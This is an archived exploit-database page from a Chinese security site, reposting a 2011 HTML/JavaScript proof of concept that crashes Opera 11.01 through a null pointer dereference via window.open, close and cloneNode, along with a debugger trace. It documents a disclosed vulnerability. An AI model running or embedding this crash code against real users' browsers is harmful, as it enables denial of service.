首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Opera 11.01 NULL PTR Derefernce
来源:vfocus.net 作者:echo 发布时间:2011-03-16  
<html>
  <head>
  <title>Opera 11.01 Null Ptr Derefer</title>
  </head>
  <body>
   <script type="text/JavaScript" language="JavaScript">
  
    /*
    * [+]. Title : Opera 11.01 Null Pointer Derefernce
    * [+]. Date : 15.03.2011 05:18
    * [+]. Author: echo
    * [+]. Version: 11.01
    * [+]. Software link: http://www.opera.com/download/
    * [+]. Tested on : Win32 xp home sp 2
    * [+]. CVE : NULL   
    * ---------------------------------------
    * 675B5646  MOV ECX,DWORD PTR DS:[EDI+8]  
    * DS:[00000008]=???
    * ECX=00000000  
    * EDI=00000000                   
    */
    var iWin  = window.open();
    var iShit = iWin.document.createElement("ANY");
        iWin.document.body.appendChild(iShit);
        iWin.close();
        iWin.document.cloneNode("HiH"); 
       
   </script>
  </body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Foxit PDF Reader 4.2 Javascrip
·If-CMS 2.07 Pre-Auth Local Fil
·ABBS Electronic Flash Cards 2.
·HP OpenView Performance Insigh
·ABBS Audio Media Player 3.0 .l
·Adobe ColdFusion - Directory T
·Android 2.0 ,2.1, 2.1.1 WebKit
·AVIPreview 0.26 Alpha Denial o
·Linux <= 2.6.37-rc1 serial_cor
·Sun Java Applet2ClassLoader Re
·checkview v1.1 for iPhone / iP
·Nostromo 1.9.3 Directory Trave
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved